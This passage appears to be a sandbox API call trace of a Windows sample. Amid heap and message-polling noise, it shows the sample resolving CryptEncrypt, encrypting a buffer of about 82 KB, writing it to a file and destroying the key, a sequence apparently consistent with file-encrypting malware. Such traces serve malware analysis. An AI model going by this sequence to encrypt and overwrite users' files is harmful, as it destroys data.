dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0220.334] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0220.334] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.334] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0220.335] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab7d0 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71db8 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0220.335] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab818 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0220.335] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71fe8 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.335] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.335] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.335] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e700 | out: hHeap=0x2af0000) returned 1 [0220.335] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.336] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab968 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.337] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.339] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3867020 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0220.340] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0220.341] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbd8 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0220.341] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0220.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.341] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabb48, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.341] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13fe5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13fe8) returned 1 [0220.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.342] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.342] CharLowerBuffW (in: lpsz="byte[81896]", cchLength=0xb | out: lpsz="byte[81896]") returned 0xb [0220.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.345] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.345] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.345] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.345] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.345] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.345] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0220.346] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0220.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0220.346] CryptEncrypt (in: hKey=0x9e1cb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3867020*, pdwDataLen=0x8cef60*=0x13fe5, dwBufLen=0x13fe8 | out: pbData=0x3867020*, pdwDataLen=0x8cef60*=0x13fe8) returned 1 [0220.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.357] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.359] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.359] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.359] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.359] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.359] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.359] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.359] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.359] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.359] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.360] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.360] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.360] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.360] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.360] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0220.360] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0220.369] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.370] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.370] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.371] WriteFile (in: hFile=0x510, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0x13fe8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0x13fe8, lpOverlapped=0x0) returned 1 [0220.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.373] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.373] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0220.373] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.373] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0220.373] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.373] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.373] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.373] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.373] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.373] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.373] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0220.373] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.373] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0220.373] CryptDestroyKey (hKey=0x9e1cb8) returned 1 [0220.373] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.373] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0220.373] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0220.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.374] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0220.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.374] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0220.374] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.374] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0220.374] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.374] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.374] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.374] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.374] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0220.374] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 